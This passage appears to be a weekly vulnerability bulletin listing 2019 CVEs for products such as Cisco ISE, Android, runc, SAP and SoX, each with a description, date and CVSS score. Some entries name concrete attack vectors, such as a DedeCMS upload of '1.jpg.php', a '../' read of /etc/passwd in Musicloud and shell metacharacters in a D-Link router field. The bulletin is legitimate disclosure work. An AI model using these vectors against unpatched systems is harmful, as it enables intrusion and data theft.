cisco — identity_services_engine A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based interface. The vulnerability is due to insufficient input validation of some parameters passed to the web-based management interface. An attacker could exploit this vulnerability by convincing a user of the interface to click a specific link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information. For information about fixed software releases, consult the Cisco bug ID at https://quickview.cloudapps.cisco.com/quickview/bug/CSCvn64652. When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories and Alerts page, to determine exposure and a complete upgrade solution. 2019-02-08 3.5 CVE-2019-1673
BID
CISCO
frog_cms_project — frog_cms Frog CMS 0.9.5 has XSS via the admin/?/layout/edit/1 Body field. 2019-02-10 3.5 CVE-2018-20774
MISC
frog_cms_project — frog_cms Frog CMS 0.9.5 has XSS via the admin/?/snippet/edit/1 Body field. 2019-02-10 3.5 CVE-2018-20777
MISC
google — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Users with no extra privileges can potentially access leaked data due to uninitialized padding present in display function. 2019-02-11 2.1 CVE-2018-12006
CONFIRM
google — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Uninitialized data for socket address leads to information exposure. 2019-02-11 2.1 CVE-2018-12011
CONFIRM
google — android In avdt_scb_hdl_report of avdt_scb_act.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-111450156. 2019-02-11 3.3 CVE-2018-9588
BID
CONFIRM
google — android In ieee802_11_rx_wnmsleep_req of wnm_ap.c in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure in the wifi driver with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-111893132. 2019-02-11 2.1 CVE-2018-9589
BID
CONFIRM
google — android In llcp_dlc_proc_i_pdu of llcp_dlc.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure over NFC with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116722267. 2019-02-11 3.3 CVE-2018-9593
BID
CONFIRM
google — android In llcp_link_proc_agf_pdu of llcp_link.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure over NFC with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116791157. 2019-02-11 3.3 CVE-2018-9594
BID
CONFIRM
mcafee — true_key Data Leakage Attacks vulnerability in Microsoft Windows client in McAfee True Key (TK) 3.1.9211.0 and earlier allows local users to expose confidential data via specially crafted malware. 2019-02-13 2.1 CVE-2019-3610
CONFIRM
omron — cx-supervisor When CX-Supervisor (Versions 3.42 and prior) processes project files and tampers with the value of an offset, an attacker can force the application to read a value outside of an array. 2019-02-12 3.5 CVE-2018-19020
MISC
sap — business_one Under certain conditions SAP Business One Mobile Android App, version 1.2.12, allows an attacker to access information which would otherwise be restricted. 2019-02-15 2.1 CVE-2019-0256
BID
MISC
MISC
tenable — nessus Nessus versions 8.2.1 and earlier were found to contain a stored XSS vulnerability due to improper validation of user-supplied input. An authenticated, remote attacker could potentially exploit this vulnerability via a specially crafted request to execute arbitrary script code in a user’s browser session. Tenable has released Nessus 8.2.2 to address this issue. 2019-02-11 3.5 CVE-2019-3923
CONFIRM

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
advancecomp — advancecomp An issue was discovered in AdvanceCOMP before 2.1. An invalid memory address occurs in the function adv_png_unfilter_8 in png.c. It can be triggered by sending a crafted file to a binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact when a victim opens a specially crafted file. 2019-02-16 not yet calculated CVE-2019-8383
MISC
MISC
advancecomp — advancecomp
 
An issue was discovered in AdvanceCOMP before 2.1. A NULL pointer dereference exists in the function be_uint32_read() located in endianrw.h. It can be triggered by sending a crafted file to a binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact when a victim opens a specially crafted file. 2019-02-16 not yet calculated CVE-2019-8379
MISC
MISC
amazon — fire_os Amazon Fire OS before 5.3.6.4 allows a man-in-the-middle attack against HTTP requests for “Terms of Use” and Privacy pages. 2019-02-16 not yet calculated CVE-2019-7399
BID
MISC
atlassian — jira
 
The VerifyPopServerConnection resource in Atlassian Jira before version 7.6.10, from version 7.7.0 before version 7.7.5, from version 7.8.0 before version 7.8.5, from version 7.9.0 before version 7.9.3, from version 7.10.0 before version 7.10.3, from version 7.11.0 before version 7.11.3, from version 7.12.0 before version 7.12.3, and from version 7.13.0 before version 7.13.1 allows remote attackers who have administrator rights to determine the existence of internal hosts & open ports and in some cases obtain service information from internal network resources via a Server Side Request Forgery (SSRF) vulnerability. 2019-02-13 not yet calculated CVE-2018-13404
CONFIRM
bento4 — bento4 An issue was discovered in Bento4 1.5.1-628. A NULL pointer dereference occurs in the function AP4_List:Find located in Core/Ap4List.h when called from Core/Ap4Movie.cpp. It can be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8382
MISC
MISC
bento4 — bento4 An issue was discovered in Bento4 1.5.1-628. A NULL pointer dereference occurs in AP4_Track::GetSampleIndexForTimeStampMs() located in Core/Ap4Track.cpp. It can triggered by sending a crafted file to the mp4audioclip binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8380
MISC
MISC
bento4 — bento4
 
An issue was discovered in Bento4 1.5.1-628. A heap-based buffer over-read exists in AP4_BitStream::ReadBytes() in Codecs/Ap4BitStream.cpp, a similar issue to CVE-2017-14645. It can be triggered by sending a crafted file to the aac2mp4 binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8378
MISC
MISC
bitcoin — bitcoin_core_and_bitcoin_knots
 
Bitcoin Core 0.12.0 through 0.17.1 and Bitcoin Knots 0.12.0 through 0.17.x before 0.17.1.knots20181229 have Incorrect Access Control. Local users can exploit this to steal currency by binding the RPC IPv4 localhost port, and forwarding requests to the IPv6 localhost port. 2019-02-11 not yet calculated CVE-2018-20587
MISC
MISC
c.p.sub_project — c.p.sub C.P.Sub before 5.3 allows CSRF via a manage.php?p=article_del&id= URI. 2019-02-11 not yet calculated CVE-2019-7738
MISC
MISC
cisco — meeting_server
 
A vulnerability in the Session Initiation Protocol (SIP) call processing of Cisco Meeting Server (CMS) software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition of the Cisco Meeting Server. The vulnerability is due to insufficient validation of Session Description Protocol (SDP) messages. An attacker could exploit this vulnerability by sending a crafted SDP message to the CMS call bridge. An exploit could allow the attacker to cause the CMS to reload, causing a DoS condition for all connected clients. Versions prior to 2.3.9 are affected. 2019-02-08 not yet calculated CVE-2019-1676
BID
CISCO
cisco — network_assurance_engine
 
A vulnerability in the management web interface of Cisco Network Assurance Engine (NAE) could allow an unauthenticated, local attacker to gain unauthorized access or cause a Denial of Service (DoS) condition on the server. The vulnerability is due to a fault in the password management system of NAE. An attacker could exploit this vulnerability by authenticating with the default administrator password via the CLI of an affected server. A successful exploit could allow the attacker to view potentially sensitive information or bring the server down, causing a DoS condition. This vulnerability affects Cisco Network Assurance Engine (NAE) Release 3.0(1). The default password condition only affects new installations of Release 3.0(1). 2019-02-12 not yet calculated CVE-2019-1688
BID
CISCO
cloud_foundry — credhub_cli
 
Cloud Foundry CredHub CLI, versions prior to 2.2.1, inadvertently writes authentication credentials provided via environment variables to its persistent config file. A local authenticated malicious user with access to the CredHub CLI config file can use these credentials to retrieve and modify credentials stored in CredHub that are authorized to the targeted user. 2019-02-13 not yet calculated CVE-2019-3782
BID
CONFIRM
d-circle — power_egg Input validation issue in POWER EGG(Ver 2.0.1, Ver 2.02 Patch 3 and earlier, Ver 2.1 Patch 4 and earlier, Ver 2.2 Patch 7 and earlier, Ver 2.3 Patch 9 and earlier, Ver 2.4 Patch 13 and earlier, Ver 2.5 Patch 12 and earlier, Ver 2.6 Patch 8 and earlier, Ver 2.7 Patch 6 and earlier, Ver 2.7 Government Edition Patch 7 and earlier, Ver 2.8 Patch 6 and earlier, Ver 2.8c Patch 5 and earlier, Ver 2.9 Patch 4 and earlier) allows remote attackers to execute EL expression on the server via unspecified vectors. 2019-02-13 not yet calculated CVE-2019-5916
JVN
MISC
d-link — dir-823g_devices An issue was discovered on D-Link DIR-823G devices with firmware 1.02B03. There is incorrect access control allowing remote attackers to enable Guest Wi-Fi via the SetWLanRadioSettings HNAP API to the web service provided by /bin/goahead. 2019-02-16 not yet calculated CVE-2019-8392
MISC
d-link — dir-878_devices An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the system function with untrusted input from the request body for the SetStaticRouteIPv6Settings API function, as demonstrated by shell metacharacters in the DestNetwork field. 2019-02-12 not yet calculated CVE-2019-8317
MISC
dedecms — dedecms
 
DedeCMS through V5.7SP2 allows arbitrary file upload in dede/album_edit.php or dede/album_add.php, as demonstrated by a dede/album_edit.php?dopost=save&formzip=1 request with a ZIP archive that contains a file such as “1.jpg.php” (because input validation only checks that .jpg, .png, or .gif is present as a substring, and does not otherwise check the file name or content). 2019-02-16 not yet calculated CVE-2019-8362
MISC
dell — wyse_password_encoder
 
The Dell Wyse Password Encoder in ThinLinux2 versions prior to 2.1.0.01 contain a Hard-coded Cryptographic Key vulnerability. An unauthenticated remote attacker could reverse engineer the cryptographic system used in the Dell Wyse Password Encoder to discover the hard coded private key and decrypt locally stored cipher text. 2019-02-13 not yet calculated CVE-2018-15781
MISC
django — django Django 1.11.x before 1.11.19, 2.0.x before 2.0.11, and 2.1.x before 2.1.6 allows Uncontrolled Memory Consumption via a malicious attacker-supplied value to the django.utils.numberformat.format() function. 2019-02-11 not yet calculated CVE-2019-6975
BID
MISC
MISC
UBUNTU
MISC
MISC
dundas_data_visualization — dundas_bi
 
The Dundas BI server before 5.0.1.1010 is vulnerable to a Server-Side Request Forgery attack, allowing an attacker to forge arbitrary requests (with certain restrictions) that will be executed on behalf of the attacker, via the viewUrl parameter of the “export the dashboard as an image” feature. This could be leveraged to provide a proxy to attack other servers (internal or external) or to perform network scans of external or internal networks. 2019-02-11 not yet calculated CVE-2018-18569
MISC
eclipse — openj9
 
In Eclipse OpenJ9, prior to the 0.12.0 release, the jio_snprintf() and jio_vsnprintf() native methods ignored the length parameter. This affects existing APIs that called the functions to exceed the allocated buffer. This functions were not directly callable by non-native user code. 2019-02-11 not yet calculated CVE-2018-12547
CONFIRM
eclipse — openj9
 
In Eclipse OpenJ9 version 0.11.0, the OpenJ9 JIT compiler may incorrectly omit a null check on the receiver object of an Unsafe call when accelerating it. 2019-02-11 not yet calculated CVE-2018-12549
CONFIRM
enphase_energy — envoy XSS exists in Enphase Envoy R3.*.* via the profileName parameter to the /home URI on TCP port 8888. 2019-02-09 not yet calculated CVE-2019-7677
MISC
MISC
enphase_energy — envoy A directory traversal vulnerability was discovered in Enphase Envoy R3.*.* via images/, include/, include/js, or include/css on TCP port 8888. 2019-02-09 not yet calculated CVE-2019-7678
MISC
MISC
flatpak — flatpak Flatpak before 1.0.7, and 1.1.x and 1.2.x before 1.2.3, exposes /proc in the apply_extra script sandbox, which allows attackers to modify a host-side executable file. 2019-02-12 not yet calculated CVE-2019-8308
MISC
MISC
MISC
freebsd — freebsd In FreeBSD 11.2-STABLE after r338618 and before r343786, 12.0-STABLE before r343781, and 12.0-RELEASE before 12.0-RELEASE-p3, a bug in the reference count implementation for UNIX domain sockets can cause a file structure to be incorrectly released potentially allowing a malicious local user to gain root privileges or escape from a jail. 2019-02-12 not yet calculated CVE-2019-5596
FREEBSD
freebsd — freebsd In FreeBSD before 11.2-STABLE(r343782), 11.2-RELEASE-p9, 12.0-STABLE(r343781), and 12.0-RELEASE-p3, kernel callee-save registers are not properly sanitized before return from system calls, potentially allowing some kernel data used in the system call to be exposed. 2019-02-12 not yet calculated CVE-2019-5595
FREEBSD
genivia — gsoap Genivia gSOAP 2.7.x and 2.8.x before 2.8.75 allows attackers to cause a denial of service (application abort) or possibly have unspecified other impact if a server application is built with the -DWITH_COOKIES flag. This affects the C/C++ libgsoapck/libgsoapck++ and libgsoapssl/libgsoapssl++ libraries, as these are built with that flag. 2019-02-09 not yet calculated CVE-2019-7659
CONFIRM
gnome — keyring
 
In pam/gkr-pam-module.c in GNOME Keyring before 3.27.2, the user’s password is kept in a session-child process spawned from the LightDM daemon. This can expose the credential in cleartext. 2019-02-12 not yet calculated CVE-2018-20781
MISC
MISC
MISC
MISC
hgiga — oaklouds_mailsherlock
 
SQL Injection exists in MailSherlock before 1.5.235 for OAKlouds allows an unauthenticated user to extract the subjects of the emails of other users within the enterprise via the select_mid parameter in an letgo.cgi request. 2019-02-11 not yet calculated CVE-2018-17542
CONFIRM
CONFIRM
hiawatha — hiawatha
 
In Hiawatha before 10.8.4, a remote attacker is able to do directory traversal if AllowDotFiles is enabled. 2019-02-16 not yet calculated CVE-2019-8358
CONFIRM
ibm — qradar_siem
 
IBM QRadar SIEM 7.2 and 7.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 134177. 2019-02-15 not yet calculated CVE-2017-1695
XF
CONFIRM
ibm — infosphere_information_server
 
IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 152159. 2019-02-15 not yet calculated CVE-2018-1895
CONFIRM
XF
ibm — infosphere_information_server
 
IBM InfoSphere Information Server 11.7 could allow an authenciated user under specialized conditions to inject commands into the installation process that would execute on the WebSphere Application Server. IBM X-Force ID: 145970. 2019-02-15 not yet calculated CVE-2018-1701
XF
CONFIRM
ibm — infosphere_information_server
 
IBM InfoSphere Information Server 9.1, 11.3, 11.5, and 11.7 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 147630. 2019-02-15 not yet calculated CVE-2018-1727
XF
CONFIRM
ibm — rational_clearcase
 
IBM Rational ClearCase 1.0.0.0 GIT connector does not sufficiently protect the document database password. An attacker could obtain the password and gain unauthorized access to the document database. IBM X-Force ID: 156583. 2019-02-15 not yet calculated CVE-2019-4059
XF
CONFIRM
jforum — jforum In JForum 2.1.8, an unauthenticated, remote attacker can enumerate whether a user exists by using the “create user” function. If a register/check/username?username= request corresponds to a username that exists, then an “is already in use” error is produced. NOTE: this product is discontinued. 2019-02-12 not yet calculated CVE-2019-7550
MISC
kunbus — pr100088_modbus_gateway An attacker could retrieve plain-text credentials stored in a XML file on PR100088 Modbus gateway versions prior to Release R02 (or Software Version 1.1.13166) through FTP. 2019-02-12 not yet calculated CVE-2019-6549
MISC
kunbus — pr100088_modbus_gateway Registers used to store Modbus values can be read and written from the web interface without authentication in the PR100088 Modbus gateway versions prior to Release R02 (or Software Version 1.1.13166). 2019-02-12 not yet calculated CVE-2019-6533
MISC
kunbus — pr100088_modbus_gateway PR100088 Modbus gateway versions prior to Release R02 (or Software Version 1.1.13166) may allow an attacker to be able to change the password for an admin user who is currently or previously logged in, provided the device has not been restarted. 2019-02-12 not yet calculated CVE-2019-6527
MISC
mailmate — mailmate
 
MailMate before 1.11.3 mishandles a suspicious HTML/MIME structure in a signed/encrypted email. 2019-02-11 not yet calculated CVE-2018-15588
MISC
mambo — cms
 
A vulnerability in Mambo CMS v4.6.5 where the scripts thumbs.php, editorFrame.php, editor.php, images.php, manager.php discloses the root path of the webserver. 2019-02-15 not yet calculated CVE-2013-2565
MISC
MISC
micco — lhmelting Untrusted search path vulnerability in the installer of LHMelting (LHMelting for Win32 Ver 1.65.3.6 and earlier) allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2019-5913
JVN
MISC
micco — unarj32.dll Untrusted search path vulnerability in the installer of UNARJ32.DLL (UNARJ32.DLL for Win32 Ver 1.10.1.25 and earlier) allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2019-5912
JVN
MISC
micco — unlha32.dll Untrusted search path vulnerability in the installer of UNLHA32.DLL (UNLHA32.DLL for Win32 Ver 2.67.1.2 and earlier) allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2019-5911
JVN
MISC
micco — unlha32.dll Untrusted search path vulnerability in Self-Extracting Archives created by UNLHA32.DLL prior to Ver 3.00 allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2018-16189
JVN
MISC
micco —  unlha32.dll_and_unarj32.dll_and_lhmelting_and_lmlzh32.dll
 
Untrusted search path vulnerability in UNARJ32.DLL for Win32, LHMelting for Win32, and LMLzh32.DLL (UNARJ32.DLL for Win32 Ver 1.10.1.25 and earlier, LHMelting for Win32 Ver 1.65.3.6 and earlier, LMLzh32.DLL Ver 2.67.1.2 and earlier) allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. 2019-02-13 not yet calculated CVE-2018-16190
JVN
MISC
MISC
MISC
MISC
micro_focus — solutions_business_manager
 
An Authentication Bypass issue exists in Solutions Business Manager (SBM) (formerly Serena Business Manager (SBM)) versions prior to 11.5. 2019-02-12 not yet calculated CVE-2018-19645
CONFIRM
msmtp — msmtp
 
In msmtp 1.8.2, when tls_trust_file has its default configuration, certificate-verification results are not properly checked. 2019-02-13 not yet calculated CVE-2019-8337
CONFIRM
multiple_vendors — runc
 
runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe. 2019-02-11 not yet calculated CVE-2019-5736
BID
REDHAT
REDHAT
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
EXPLOIT-DB
EXPLOIT-DB
MISC
MISC
musicloud — musicloud
 
A file-read vulnerability was identified in the Wi-Fi transfer feature of Musicloud 1.6. By default, the application runs a transfer service on port 8080, accessible by everyone on the same Wi-Fi network. An attacker can send the POST parameters downfiles and cur-folder (with a crafted ../ payload) to the download.script endpoint. This will create a MusicPlayerArchive.zip archive that is publicly accessible and includes the content of any requested file (such as the /etc/passwd file). 2019-02-16 not yet calculated CVE-2019-8389
MISC
open_source_solution_technology_corporation — openam Open redirect vulnerability in OpenAM (Open Source Edition) 13.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a specially crafted page. 2019-02-13 not yet calculated CVE-2019-5915
JVN
MISC
MISC
open_source_solution_technology_corporation — openam OpenAM (Open Source Edition) 13.0 and later does not properly manage sessions, which allows remote authenticated attackers to change the security questions and reset the login password via unspecified vectors. 2019-02-13 not yet calculated CVE-2018-0696
JVN
MISC
MISC
phpscriptsmall.com — responsive_video_news_script PHP Scripts Mall Responsive Video News Script has XSS via the Search Bar. This might, for example, be leveraged for HTML injection or URL redirection. 2019-02-16 not yet calculated CVE-2019-8361
MISC
MISC
pmd — pmd
 
PMD 5.8.1 and earlier processes XML external entities in ruleset files it parses as part of the analysis process, allowing attackers tampering it (either by direct modification or MITM attacks when using remote rulesets) to perform information disclosure, denial of service, or request forgery attacks. (PMD 6.x is unaffected because of a 2017-09-15 change.) 2019-02-11 not yet calculated CVE-2019-7722
MISC
qualcomm — snapdragon If an end user makes use of SCP11 sample OCE code without modification it could lead to a buffer overflow when transmitting a CAPDU in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT and Snapdragon Mobile in versions MDM9607, MDM9650, MDM9655, MSM8996AU, SD 210/SD 212/SD 205, SD 410/12, SD 636, SD 820, SD 820A, SD 835, SD 8CX, SDA660, SDM630, SDM660. 2019-02-11 not yet calculated CVE-2018-11855
CONFIRM
qualcomm — snapdragon Malicious TA can tag QSEE kernel memory and map to EL0, there by corrupting the physical memory as well it can be used to corrupt the QSEE kernel and compromise the whole TEE in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables and Snapdragon Wired Infrastructure and Networking in versions IPQ8074, MDM9206, MDM9607, MDM9650, MDM9655, MSM8909W, MSM8996AU, QCA8081, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 650/52, SD 820, SD 820A, SD 835, SD 8CX, SDM439 and Snapdragon_High_Med_2016 2019-02-11 not yet calculated CVE-2018-11847
BID
CONFIRM
rubygems — fileutils Vulnerability in FileUtils v0.7, Ruby Gem Fileutils <= v0.7 Command Injection vulnerability in user supplied url variable that is passed to the shell. 2019-02-15 not yet calculated CVE-2013-2516
MISC
MISC
sap — abap_platform
 
SLD Registration of ABAP Platform allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service. Fixed in versions KRNL32NUC 7.21, 7.21EXT, 7.22, 7.22EXT,KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT, KRNL64NUC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49,KRNL64UC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49. 7.73 KERNEL from 7.21 to 7.22, 7.45, 7.49, 7.53, 7.73, 7.75. 2019-02-15 not yet calculated CVE-2019-0265
BID
MISC
MISC
sap — businessobjects
 
SAP BusinessObjects, versions 4.2 and 4.3, (Visual Difference) allows an attacker to upload any file (including script files) without proper file format validation. 2019-02-15 not yet calculated CVE-2019-0259
BID
MISC
MISC
sap — disclosure_management
 
SAP Disclosure Management, version 10.01, does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. 2019-02-15 not yet calculated CVE-2019-0258
BID
MISC
MISC
sap — disclosure_management
 
SAP Disclosure Management (before version 10.1 Stack 1301) does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. 2019-02-15 not yet calculated CVE-2019-0254
BID
MISC
MISC
sap — fiori_launchpad
 
The Fiori Launchpad of SAP BusinessObjects, before versions 4.2 and 4.3, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. 2019-02-15 not yet calculated CVE-2019-0251
BID
MISC
MISC
sap — hana_extended_application_services
 
Under certain conditions SAP HANA Extended Application Services, version 1.0, advanced model (XS advanced) writes credentials of platform users to a trace file of the SAP HANA system. Even though this trace file is protected from unauthorized access, the risk of leaking information is increased. 2019-02-15 not yet calculated CVE-2019-0266
BID
MISC
MISC
sap — hana_extended_application_services
 
Under certain circumstances, SAP HANA Extended Application Services, advanced model (XS advanced) does not perform authentication checks properly for XS advanced platform and business users. Fixed in 1.0.97 to 1.0.99 (running on SAP HANA 1 or SAP HANA 2 SPS0 (second S stands for stack)). 2019-02-15 not yet calculated CVE-2019-0261
BID
MISC
MISC
sap — manufacturing_integration_and_intelligence
 
SAP Manufacturing Integration and Intelligence, versions 15.0, 15.1 and 15.2, (Illuminator Servlet) currently does not provide Anti-XSRF tokens. This might lead to XSRF attacks in case the data is being posted to the Servlet from an external application. 2019-02-15 not yet calculated CVE-2019-0267
BID
MISC
MISC
sap — netweaver_as_abap_platform
 
Customizing functionality of SAP NetWeaver AS ABAP Platform (fixed in versions from 7.0 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.53, from 7.74 to 7.75) does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. 2019-02-15 not yet calculated CVE-2019-0257
BID
MISC
MISC
sap — netweaver_as_abap_platform
 
SAP NetWeaver AS ABAP Platform, Krnl64nuc 7.74, krnl64UC 7.73, 7.74, Kernel 7.73, 7.74, 7.75, fails to validate type of installation for an ABAP Server system correctly. That behavior may lead to situation, where business user achieves access to the full SAP Menu, that is ‘Easy Access Menu’. The situation can be misused by any user to leverage privileges to business functionality. 2019-02-15 not yet calculated CVE-2019-0255
BID
MISC
MISC
sap — webintelligence_bilaunchpad
 
SAP WebIntelligence BILaunchPad, versions 4.10, 4.20, does not sufficiently encode user-controlled inputs in generated HTML reports, resulting in Cross-Site Scripting (XSS) vulnerability. 2019-02-15 not yet calculated CVE-2019-0262
BID
MISC
MISC
sound_exchange_project — sound_exchange An issue was discovered in SoX 14.4.2. lsx_make_lpf in effect_i_dsp.c allows a NULL pointer dereference. 2019-02-15 not yet calculated CVE-2019-8357
MISC
sound_exchange_project — sound_exchange An issue was discovered in SoX 14.4.2. lsx_make_lpf in effect_i_dsp.c has an integer overflow on the result of multiplication fed into malloc. When the buffer is allocated, it is smaller than expected, leading to a heap-based buffer overflow. 2019-02-15 not yet calculated CVE-2019-8354
MISC
sound_exchange_project — sound_exchange An issue was discovered in SoX 14.4.2. One of the arguments to bitrv2 in fft4g.c is not guarded, such that it can lead to write access outside of the statically declared array, aka a stack-based buffer overflow. 2019-02-15 not yet calculated CVE-2019-8356
MISC
sound_exchange_project — sound_exchange An issue was discovered in SoX 14.4.2. In xmalloc.h, there is an integer overflow on the result of multiplication fed into the lsx_valloc macro that wraps malloc. When the buffer is allocated, it is smaller than expected, leading to a heap-based buffer overflow in channels_start in remix.c. 2019-02-15 not yet calculated CVE-2019-8355
MISC
tcpcrypt — boks
 
A buffer overflow exists in HelpSystems tcpcrypt on Linux, used for BoKS encrypted telnet through BoKS version 6.7.1. Since tcpcrypt is setuid, exploitation leads to privilege escalation. 2019-02-08 not yet calculated CVE-2018-20764
CONFIRM
tcpreplay — tcpreplay An issue was discovered in Tcpreplay 4.3.1. An invalid memory access occurs in do_checksum in checksum.c. It can be triggered by sending a crafted pcap file to the tcpreplay-edit binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8381
MISC
MISC
tcpreplay — tcpreplay An issue was discovered in Tcpreplay 4.3.1. A NULL pointer dereference occurred in the function get_ipv6_l4proto() located at get.c. This can be triggered by sending a crafted pcap file to the tcpreplay-edit binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8377
MISC
MISC
tcpreplay — tcpreplay
 
An issue was discovered in Tcpreplay 4.3.1. A NULL pointer dereference occurred in the function get_layer4_v6() located at get.c. This can be triggered by sending a crafted pcap file to the tcpreplay-edit binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 2019-02-16 not yet calculated CVE-2019-8376
MISC
MISC
themerig — find_a_place_cms_directory Themerig Find a Place CMS Directory 1.5 has SQL Injection via the find/assets/external/data_2.php cate parameter. 2019-02-16 not yet calculated CVE-2019-8360
MISC
tibco — silver_fabric
 
The SOAP Admin API component of TIBCO Software Inc.’s TIBCO Silver Fabric contains a vulnerability that may allow reflected cross-site scripting (XSS) attacks. Affected releases are TIBCO Software Inc.’s TIBCO Silver Fabric: versions up to and including 5.8.1. 2019-02-13 not yet calculated CVE-2018-12409
BID
MISC
CONFIRM
ua_parser_project — uap_core
 
An issue was discovered in regex.yaml (aka regexes.yaml) in UA-Parser UAP-Core before 0.6.0. A Regular Expression Denial of Service (ReDoS) issue allows remote attackers to overload a server by setting the User-Agent header in an HTTP(S) request to a value containing a long digit string. (The UAP-Core project contains the vulnerability, propagating to all implementations.) 2019-02-13 not yet calculated CVE-2018-20164
MISC
MISC
MISC
ubiquiti_networks — airmax_and_edgemax
 
Denial of Service attack in airMAX < 8.3.2 , airMAX < 6.0.7 and EdgeMAX < 1.9.7 allow attackers to use the Discovery Protocol in amplification attacks. 2019-02-12 not yet calculated CVE-2017-0938
MISC
MISC
MISC
verydows — verydows
 
Verydows 2.0 has XSS via the index.php?c=main a parameter, as demonstrated by an a=index[XSS] value. 2019-02-16 not yet calculated CVE-2019-8363
MISC
wecon — levistudiou Multiple stack-based buffer overflow vulnerabilities in WECON LeviStudioU version 1.8.56 and prior may be exploited when parsing strings within project files. The process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage these vulnerabilities to execute code under the context of the current process. Mat Powell, Ziad Badawi, and Natnael Samson working with Trend Micro’s Zero Day Initiative, reported these vulnerabilities to NCCIC. 2019-02-12 not yet calculated CVE-2019-6537
BID
MISC
wordpress — wordpress Vulnerability in Easy2map-photos WordPress Plugin v1.09 MapPinImageUpload.php and MapPinIconSave.php allows path traversal when specifying file names creating files outside of the upload directory. 2019-02-15 not yet calculated CVE-2015-4617
MISC
MISC
wordpress — wordpress
 
